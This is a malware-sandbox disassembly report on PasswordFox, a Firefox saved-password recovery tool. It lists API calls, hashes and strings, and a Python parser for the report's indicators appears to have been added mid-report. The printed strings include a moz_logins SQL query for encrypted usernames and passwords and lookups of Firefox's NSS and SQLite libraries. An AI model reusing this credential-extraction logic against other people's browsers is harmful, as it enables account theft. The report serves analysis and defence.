                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _snwprintf$memset$wcscpy
                                        • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                        • API String ID: 2000436516-3842416460
                                        • Opcode ID: b5760ba2ecb5c71c25fe5a138b9a73d33b54b4adf2fcc02053158ea44dd8fb82
                                        • Instruction ID: 8c679b64bd822a11a4db2b245e7836b5362e54c0cf9053333f32ebf9adf46155
                                        • Opcode Fuzzy Hash: b5760ba2ecb5c71c25fe5a138b9a73d33b54b4adf2fcc02053158ea44dd8fb82
                                        • Instruction Fuzzy Hash: C24113B194021DAAEB20EB55CC45FFB727CFF44344F4441BAB918B2192E7349B548BAD
                                        APIs
                                          • Part of subcall function 00404216: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,00403C73,?), ref: 00404228
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00403C84
                                        • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 00403C98
                                          • Part of subcall function 00404ADD: ReadFile.KERNEL32(?,?,?,00000000,00000000,00000001,?,00403CAA,?,00000000,00000000), ref: 00404AF4
                                        • memset.MSVCRT ref: 00403CC7
                                        • memset.MSVCRT ref: 00403CE7
                                        • memset.MSVCRT ref: 00403CFC
                                        • strcmp.MSVCRT ref: 00403D20
                                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00403E85
                                        • CloseHandle.KERNEL32(?), ref: 00403E8E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filememset$??2@??3@CloseCreateHandleReadSizestrcmp
                                        • String ID: ---
                                        • API String ID: 2784192885-2854292027
                                        • Opcode ID: 552d603059e62ae8c9e5a66bb488f6aa050529ee5c50509e70ef86cc3eb9e9cf
                                        • Instruction ID: b80983b98e9648236443da80f1610546219466077700600bd95e69fe60c60e57
                                        • Opcode Fuzzy Hash: 552d603059e62ae8c9e5a66bb488f6aa050529ee5c50509e70ef86cc3eb9e9cf
                                        • Instruction Fuzzy Hash: 4E511FB280425DEADB219E658C818DEBB7CDF15305F1041FBE509B3182DA389FC59BE9
                                        APIs
                                          • Part of subcall function 0040B251: memset.MSVCRT ref: 0040B27C
                                          • Part of subcall function 0040B251: wcscpy.MSVCRT ref: 0040B293
                                          • Part of subcall function 0040B251: memset.MSVCRT ref: 0040B2C6
                                          • Part of subcall function 0040B251: wcscpy.MSVCRT ref: 0040B2DC
                                          • Part of subcall function 0040B251: wcscat.MSVCRT ref: 0040B2ED
                                          • Part of subcall function 0040B251: wcscpy.MSVCRT ref: 0040B313
                                          • Part of subcall function 0040B251: wcscat.MSVCRT ref: 0040B324
                                          • Part of subcall function 0040B251: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040B333
                                          • Part of subcall function 0040B251: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040B34A
                                          • Part of subcall function 0040B251: GetProcAddress.KERNEL32(?,sqlite3_open), ref: 0040B387
                                          • Part of subcall function 0040B251: GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 0040B393
                                          • Part of subcall function 0040B251: GetProcAddress.KERNEL32(?,sqlite3_step), ref: 0040B3A0
                                          • Part of subcall function 0040B251: GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 0040B3AD
                                          • Part of subcall function 0040B251: GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 0040B3BA
                                          • Part of subcall function 0040B251: GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 0040B3C7
                                        • memset.MSVCRT ref: 00403A68
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,00000000,00000000), ref: 00403A81
                                        • memset.MSVCRT ref: 00403AF2
                                        • memset.MSVCRT ref: 00403B07
                                        • _mbscpy.MSVCRT(?,00000000,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00403B7A
                                        • _mbscpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00403B90
                                        • _mbscpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00403BA6
                                        • _mbscpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00403BBC
                                        • _mbscpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00403BD2
                                        • _mbscpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00403BE8
                                        • memset.MSVCRT ref: 00403BFE
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000,00000006,?,00000001), ref: 00403C17
                                        Strings
                                        • SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 00403AB4
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc_mbscpymemset$wcscpy$ByteCharMultiWidewcscat$HandleLibraryLoadModule
                                        • String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins
                                        • API String ID: 384966959-1740008135
                                        APIs
                                          • Part of subcall function 00404248: wcslen.MSVCRT ref: 00404255
                                          • Part of subcall function 00404248: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00407299,?,<item>), ref: 00404264
                                        • memset.MSVCRT ref: 0040238C
                                        • memset.MSVCRT ref: 004023A1
                                        • memset.MSVCRT ref: 004023B6
                                        • _snwprintf.MSVCRT ref: 004023DD
                                        • wcscpy.MSVCRT ref: 004023F9
                                        • _snwprintf.MSVCRT ref: 0040243C
                                        • _snwprintf.MSVCRT ref: 00402472
                                        Strings
                                        • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00402461
                                        • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 004023CC
                                        • PasswordFox, xrefs: 00402453
                                        • <table dir="rtl"><tr><td>, xrefs: 004023F3
                                        • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00402363
                                        • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 0040240B
                                        Yara matches
                                        Similarity
                                        • API ID: _snwprintfmemset$FileWritewcscpywcslen
                                        • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$PasswordFox
                                        • API String ID: 1592343458-1216084738
                                        APIs
                                        • LoadLibraryW.KERNEL32(psapi.dll,?,00409CDD), ref: 0040A0DC
                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040A0F5
                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040A106
                                        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0040A117
                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040A128
                                        • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040A139
                                        • FreeLibrary.KERNEL32(00000000), ref: 0040A159
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$Library$FreeLoad
                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                        • API String ID: 2449869053-70141382
                                        APIs
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: _wcsicmp
                                        • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                        • API String ID: 2081463915-1959339147
                                        APIs
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409CE4), ref: 0040A054
                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040A06D
                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040A07E
                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040A08F
                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040A0A0
                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040A0B1
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                        • API String ID: 667068680-3953557276
                                        APIs
                                        • memset.MSVCRT ref: 00407A68
                                        • SHGetFileInfoW.SHELL32(0040C3EC,00000000,?,000002B4,00004001), ref: 00407A85
                                        • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 00407A9F
                                        • SendMessageW.USER32(?,00001003,00000001,?), ref: 00407AD1
                                        • SendMessageW.USER32(?,00001003,00000000,?), ref: 00407B0B
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00407B28
                                        • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00407B3F
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00407B47
                                        • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00407B5A
                                        • GetSysColor.USER32(0000000F), ref: 00407B6E
                                        • DeleteObject.GDI32(?), ref: 00407BA2
                                        • DeleteObject.GDI32(00000000), ref: 00407BA5
                                        • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00407BC3
                                        Yara matches
                                        Similarity
                                        • API ID: MessageSend$DeleteHandleImageLoadModuleObject$ColorFileInfomemset
                                        • String ID:
                                        • API String ID: 3623935593-0
                                        APIs
                                        • wcscpy.MSVCRT ref: 00405E47
                                        • wcscpy.MSVCRT ref: 00405E57
                                          • Part of subcall function 004059B2: memset.MSVCRT ref: 004059D7
                                          • Part of subcall function 004059B2: GetPrivateProfileStringW.KERNEL32(0040FDA8,?,0040C3EC,?,00001000,0040FB98), ref: 004059FF
                                          • Part of subcall function 004059B2: WritePrivateProfileStringW.KERNEL32(0040FDA8,?,?,0040FB98), ref: 00405A17
                                        • EnumResourceNamesW.KERNEL32(?,00000004,Function_00005C0C,00000000,?,?,?,?,?,?,?,00000000,?,?,00405F3B,00000000), ref: 00405EA5
                                        • EnumResourceNamesW.KERNEL32(?,00000005,Function_00005C0C,00000000,?,?,?,?,?,?,?,00000000,?,?,00405F3B,00000000), ref: 00405EAD
                                        • wcscpy.MSVCRT ref: 00405EB5
                                          • Part of subcall function 00405D0F: memset.MSVCRT ref: 00405D33
                                          • Part of subcall function 00405D0F: LoadStringW.USER32(?,00000000,?,00001000), ref: 00405D4B
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: Stringwcscpy$EnumNamesPrivateProfileResourcememset$LoadWrite
                                        • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                        • API String ID: 4216465668-517860148
                                        APIs
                                        • wcschr.MSVCRT ref: 0040A17A
                                        • wcscpy.MSVCRT ref: 0040A18A
                                          • Part of subcall function 0040434A: wcslen.MSVCRT ref: 00404359
                                          • Part of subcall function 0040434A: wcslen.MSVCRT ref: 00404363
                                          • Part of subcall function 0040434A: _memicmp.MSVCRT ref: 0040437E
                                        • wcscpy.MSVCRT ref: 0040A1D9
                                        • wcscat.MSVCRT ref: 0040A1E4
                                        • memset.MSVCRT ref: 0040A1C0
                                          • Part of subcall function 00404708: GetWindowsDirectoryW.KERNEL32(004101F8,00000104,?,0040A219,?,?,00000000,00000208,00000000), ref: 0040471E
                                          • Part of subcall function 00404708: wcscpy.MSVCRT ref: 0040472E
                                        • memset.MSVCRT ref: 0040A208
                                        • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,00000000), ref: 0040A223
                                        • wcscat.MSVCRT ref: 0040A22F
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                        • String ID: \systemroot
                                        • API String ID: 4173585201-1821301763
                                        APIs
                                        • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 00408085
                                          • Part of subcall function 00404177: LoadCursorW.USER32(00000000,00007F02), ref: 0040417E
                                          • Part of subcall function 00404177: SetCursor.USER32(00000000), ref: 00404185
                                        • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 004080A8
                                          • Part of subcall function 00407FC5: _snwprintf.MSVCRT ref: 00407FF2
                                          • Part of subcall function 00407FC5: _snwprintf.MSVCRT ref: 0040801D
                                          • Part of subcall function 00407FC5: wcscat.MSVCRT ref: 00408030
                                          • Part of subcall function 00407FC5: SendMessageW.USER32(?,0000040B,00000000,?), ref: 00408057
                                        • SetCursor.USER32 ref: 004080CD
                                        • SetFocus.USER32(?), ref: 004080DF
                                        • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 004080F6
                                        • memset.MSVCRT ref: 0040810C
                                        • _snwprintf.MSVCRT ref: 00408131
                                        • SetWindowTextW.USER32(?,?), ref: 00408146
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: MessageSend$Cursor_snwprintf$FocusLoadTextWindowmemsetwcscat
                                        • String ID: %s: %s$PasswordFox
                                        • API String ID: 2693631882-2734655586
                                        APIs
                                        • SetBkMode.GDI32(?,00000001), ref: 004090F8
                                        • SetTextColor.GDI32(?,00FF0000), ref: 00409106
                                        • SelectObject.GDI32(?,?), ref: 0040911B
                                        • DrawTextExW.USER32(?,?,000000FF,?,00000004,?), ref: 00409151
                                        • SelectObject.GDI32(00000014,00000000), ref: 0040915B
                                          • Part of subcall function 00408F10: GetCursorPos.USER32(?), ref: 00408F1D
                                          • Part of subcall function 00408F10: GetSubMenu.USER32(?,00000000), ref: 00408F2B
                                          • Part of subcall function 00408F10: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 00408F58
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00409176
                                        • LoadCursorW.USER32(00000000,00000067), ref: 0040917F
                                        • SetCursor.USER32(00000000), ref: 00409186
                                        • PostMessageW.USER32(?,0000041C,00000000,00000000), ref: 004091A8
                                        • SetFocus.USER32(?), ref: 004091DD
                                        • SetFocus.USER32(?), ref: 00409244
                                        Yara matches
                                        Similarity
                                        • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawHandleLoadMessageModeModulePopupPostTrack
                                        • String ID:
                                        • API String ID: 3230168590-0
                                        • Opcode ID: 79913bb0ae7908b1afa49cf06df9eb51bff68f541d465b13dfec1c32defbd00a
                                        • Instruction ID: f9130b7363a63fa1dd0b9d48565e412759fc459cce7eecf89893da159909f402
                                        • Opcode Fuzzy Hash: 79913bb0ae7908b1afa49cf06df9eb51bff68f541d465b13dfec1c32defbd00a
                                        • Instruction Fuzzy Hash: 9551A071600206FFDB149FA4C988AAA7775BB48310F10067AF525BB2E2C738AC51DF99
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                        • String ID: 0$6
                                        • API String ID: 4066108131-3849865405
                                        • Opcode ID: b6caae16324956fea7a1c4035ed61f7a3c60bedf070798a807fcdaab4c85fed2
                                        • Instruction ID: 4f496d6a710761ec625949cb3b7857caba8e1bb3d452f86d9d6fc5bdc1e7d867
                                        • Opcode Fuzzy Hash: b6caae16324956fea7a1c4035ed61f7a3c60bedf070798a807fcdaab4c85fed2
                                        • Instruction Fuzzy Hash: 2E319C72408304AFDB209F91D880A9BB7E8EF84314F40493EF988A2291D339D905CF9A
                                        APIs
                                        • LoadLibraryW.KERNEL32(comctl32.dll), ref: 0040260F
                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00402621
                                        • FreeLibrary.KERNEL32(00000000), ref: 00402635
                                        • 6F551CD0.COMCTL32 ref: 00402643
                                        • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00402660
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Library$AddressF551FreeLoadMessageProc
                                        • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                        • API String ID: 269827459-317687271
                                        • Opcode ID: 1a228f069c8e191ef87cd7f52c1f45f5c19ff6b9c2c00f2d2f5da7869437e64b
                                        • Instruction ID: 26794b545e1ef44de9f43929d311897303b1a6ca7faf20d8154e529f8b560f2f
                                        • Opcode Fuzzy Hash: 1a228f069c8e191ef87cd7f52c1f45f5c19ff6b9c2c00f2d2f5da7869437e64b
                                        • Instruction Fuzzy Hash: 1801D671751601EAD3115BB09DCDB6B799CDF41749B10023AE502F22C0EBF9CD018A6D
                                        APIs
                                        • GetModuleHandleW.KERNEL32(nss3.dll,00000000,?,?,74DEF3A0,00409FCC,?,?,?,?,?,00000000), ref: 00409E85
                                        • GetModuleHandleW.KERNEL32(sqlite3.dll,?,74DEF3A0,00409FCC,?,?,?,?,?,00000000), ref: 00409E8E
                                        • GetModuleHandleW.KERNEL32(mozsqlite3.dll,?,74DEF3A0,00409FCC,?,?,?,?,?,00000000), ref: 00409E97
                                        • FreeLibrary.KERNEL32(00000000,?,74DEF3A0,00409FCC,?,?,?,?,?,00000000), ref: 00409EA6
                                        • FreeLibrary.KERNEL32(00000000,?,74DEF3A0,00409FCC,?,?,?,?,?,00000000), ref: 00409EAD
                                        • FreeLibrary.KERNEL32(00000000,?,74DEF3A0,00409FCC,?,?,?,?,?,00000000), ref: 00409EB4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeHandleLibraryModule
                                        • String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
                                        • API String ID: 662261464-3550686275
                                        • Opcode ID: 65bb279b1682e9eef8c69532225dc9fc0058e63144ed11cb9bbc0510ad60409b
                                        • Instruction ID: 08c439e0005e5b6272bef9f9fc045148d78c5181b00ef59778e5949af8958093
                                        • Opcode Fuzzy Hash: 65bb279b1682e9eef8c69532225dc9fc0058e63144ed11cb9bbc0510ad60409b
                                        • Instruction Fuzzy Hash: 24E04823E4136DA6CA10A7F59D84D2B7E5CDCC5AE13150437AD00732D29EBD5C0149F9
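The entry above is the one a responder cares about: the code looks up nss3.dll, sqlite3.dll and mozsqlite3.dll by name, the Mozilla NSS and SQLite libraries that a Firefox login-store reader needs, and the comctl32.dll entry further up resolves InitCommonControlsEx through GetProcAddress rather than an import. The following Python is an added example, not Joe Sandbox's code and not the sample's: it parses API lines in the shape this report uses (the constructed SAMPLE_LISTING is assembled from entries on this page) and extracts those two indicators plus calls the disassembler could not name. The helper names and the indicator list are my own.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

# Constructed input: "APIs" lines copied from entries in this report, in the
# exact shape the report prints them (bullet, Func.MODULE(args), ref: address).
SAMPLE_LISTING = """\
• GetModuleHandleW.KERNEL32(nss3.dll,00000000,?,?,74DEF3A0,00409FCC,?,?,?,?,?,00000000), ref: 00409E85
• GetModuleHandleW.KERNEL32(sqlite3.dll,?,74DEF3A0,00409FCC,?,?,?,?,?,00000000), ref: 00409E8E
• GetModuleHandleW.KERNEL32(mozsqlite3.dll,?,74DEF3A0,00409FCC,?,?,?,?,?,00000000), ref: 00409E97
• FreeLibrary.KERNEL32(00000000,?,74DEF3A0,00409FCC,?,?,?,?,?,00000000), ref: 00409EA6
• LoadLibraryW.KERNEL32(comctl32.dll), ref: 0040260F
• GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00402621
  • Part of subcall function 00404530: GetFileAttributesW.KERNELBASE(00000000,004034E5,00000000), ref: 00404534
• wcscpy.MSVCRT ref: 00405D8A
• 6F551CD0.COMCTL32 ref: 00402643
"""

# One report line. The argument list is optional (wcscpy.MSVCRT ref: ...) and may
# itself contain parentheses (format strings like "%s (%s)"), so it is matched
# greedily up to the last ')' before ", ref:".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<func>[^.\s(]+)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Module names whose presence a Firefox credential reader depends on (assumed
# indicator list; nss3.dll carries the NSS decryption routines).
FIREFOX_STORE_MODULES = {"nss3.dll", "sqlite3.dll", "mozsqlite3.dll"}


@dataclass
class ApiCall:
    func: str
    module: str
    args: List[str]
    ref: str                  # address of the call site
    subcall_of: Optional[str] # address of the callee when the line is a "Part of subcall" entry


def parse_listing(text: str) -> List[ApiCall]:
    """Parse every recognisable API line; unrelated lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw is not None else []
        calls.append(ApiCall(m.group("func"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return calls


def firefox_module_lookups(calls: List[ApiCall]) -> Set[str]:
    """Module names from the indicator list that are probed via GetModuleHandle*/LoadLibrary*."""
    found = set()
    for c in calls:
        if c.func.startswith(("GetModuleHandle", "LoadLibrary")) and c.args:
            name = c.args[0].lower()
            if name in FIREFOX_STORE_MODULES:
                found.add(name)
    return found


def dynamic_resolutions(calls: List[ApiCall]) -> List[Tuple[Optional[str], str]]:
    """Pair each GetProcAddress with the most recent LoadLibrary*/GetModuleHandle* target.

    GetProcAddress's first argument is the module handle, which the report
    renders as a placeholder, so the module name is recovered from the
    preceding load call (a heuristic: interleaved subcalls can mislead it).
    """
    pairs = []
    last_module: Optional[str] = None
    for c in calls:
        if c.func.startswith(("LoadLibrary", "GetModuleHandle")) and c.args:
            last_module = c.args[0]
        elif c.func == "GetProcAddress" and len(c.args) >= 2:
            pairs.append((last_module, c.args[1]))
    return pairs


def unresolved_calls(calls: List[ApiCall]) -> List[ApiCall]:
    """Calls whose 'name' is a bare address: an indirect call the disassembler could not map to an import."""
    return [c for c in calls if re.fullmatch(r"[0-9A-F]{8}", c.func)]


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE_LISTING)
    print("firefox modules probed:", sorted(firefox_module_lookups(parsed)))
    print("dynamic resolutions:", dynamic_resolutions(parsed))
    print("unresolved call sites:", [c.ref for c in unresolved_calls(parsed)])
```

The three module-name lookups go through GetModuleHandleW, which only returns a handle when the library is already mapped into the process, so on this pass the code is checking rather than loading; the paired FreeLibrary calls release whatever handles it obtained. The same parser can be pointed at the other entries on this page, for instance to decode the constant arguments: the 0000FDE9 passed to MultiByteToWideChar further down is code page 65001 (CP_UTF8).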
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: free$wcslen
                                        • String ID:
                                        • API String ID: 3592753638-3916222277
                                        • Opcode ID: ddb550bc4d18b6149fc12f57054d732c8a3faa90f620d1426dd72524d1c7f83f
                                        • Instruction ID: 7b97a1965dd34fe5720687fb37fcb42d93b5fc4f6429c7fb3a30afb56e8cdd22
                                        • Opcode Fuzzy Hash: ddb550bc4d18b6149fc12f57054d732c8a3faa90f620d1426dd72524d1c7f83f
                                        • Instruction Fuzzy Hash: 1D61343040C3469BEB68AF11D58442BB7B1FF84716F90093FF482A62A1E779D985CB4E
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00402460,PasswordFox), ref: 00405430
                                        • wcscpy.MSVCRT ref: 00405472
                                          • Part of subcall function 004058E3: memset.MSVCRT ref: 004058F6
                                          • Part of subcall function 004058E3: _itow.MSVCRT ref: 00405904
                                        • wcslen.MSVCRT ref: 00405490
                                        • GetModuleHandleW.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00402460,PasswordFox), ref: 0040549E
                                        • LoadStringW.USER32(00000000,00000006,?,?), ref: 004054C9
                                        • memcpy.MSVCRT(00000000,00000002), ref: 00405509
                                          • Part of subcall function 0040534F: ??2@YAPAXI@Z.MSVCRT(00000000,004053FF,00402460,PasswordFox), ref: 00405389
                                          • Part of subcall function 0040534F: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,004053FF,00402460,PasswordFox), ref: 004053A7
                                          • Part of subcall function 0040534F: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,004053FF,00402460,PasswordFox), ref: 004053C5
                                          • Part of subcall function 0040534F: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,004053FF,00402460,PasswordFox), ref: 004053E3
                                        Strings
                                        • strings, xrefs: 00405468
